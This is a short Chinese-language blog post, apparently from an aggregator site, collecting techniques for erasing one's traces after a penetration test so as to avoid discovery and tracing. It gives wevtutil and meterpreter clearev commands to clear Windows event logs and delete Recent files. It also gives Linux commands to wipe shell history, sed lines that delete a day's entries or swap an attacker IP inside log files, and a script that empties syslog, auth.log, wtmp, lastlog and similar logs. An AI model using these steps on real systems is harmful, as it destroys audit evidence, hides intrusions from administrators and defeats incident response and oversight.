簡介

滲透測試結束后，為了減少被發(fā)現(xiàn)和追溯的概率，有必要清除自己的攻擊痕跡，這里注意記錄一下自己收集記錄的一些技巧,注意是清理掉訪問日志等各種記錄，愿用的上。

Windows日志清理

開始程序-->管理工具-->計算機管理-->系統(tǒng)工具-->事件查看器-->清除日志

windows + r

eventvwr.msc(事件查看器) --> 清除日志記錄

wevtutil 命令

wevtutil el???????????????????? #列出系統(tǒng)中所有日志

wevtutil cl system???????? #清理系統(tǒng)日志

wevtutil cl application?? #清理應用程序日志

wevtutil cl security??????? #清理安全日志

meterpreter后滲透清理模塊

clearev（meterpreter自帶的清除日志命令）? #清除應用程序日志、系統(tǒng)日志、安全日志

清除recent

刪除 C:\Users\Administrator\Recent下的所有內容

del /f /s /q "%userprofile\Recent*.*"

Linux 日志清理

history -c

history -cw

history -r

rm .bash_history

echo "" .bash_history

#vim清理命令記錄

:set history=0

:!command

#清理當天日志

sed -i '/當天的日期/'d 文件名

#修改日志記錄

sed -i 's/172.0.4.5/127.0.0.1/g'? 文件名 ? ? ? #將所有172.0.4.5的ip替換為127.0.0.1

/var/log目錄下存放這linux主機的各種日志記錄

一定一定不能直接刪除，否則麻煩可能就大了，可以寫個小腳本將日志文件清空

#!/usr/bin/sh

echo > /var/log/syslog

echo > /var/log/messages

echo > /var/log/httpd/access_log

echo > /var/log/secure

echo > /var/log/wtmp

echo > /var/log/btmp

echo > /var/log/utmp

echo > /var/log/lastlog

echo > /var/log/auth.log

echo > /var/log/user.log

rm .bash_history

history -cw

---

結語

人是會變的，人在懂事后也應該做出改變，沒有改變就不會有進步，改變不了想法的人什么也改變不了。

總結

以上是生活随笔為你收集整理的后渗透痕迹清理记录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。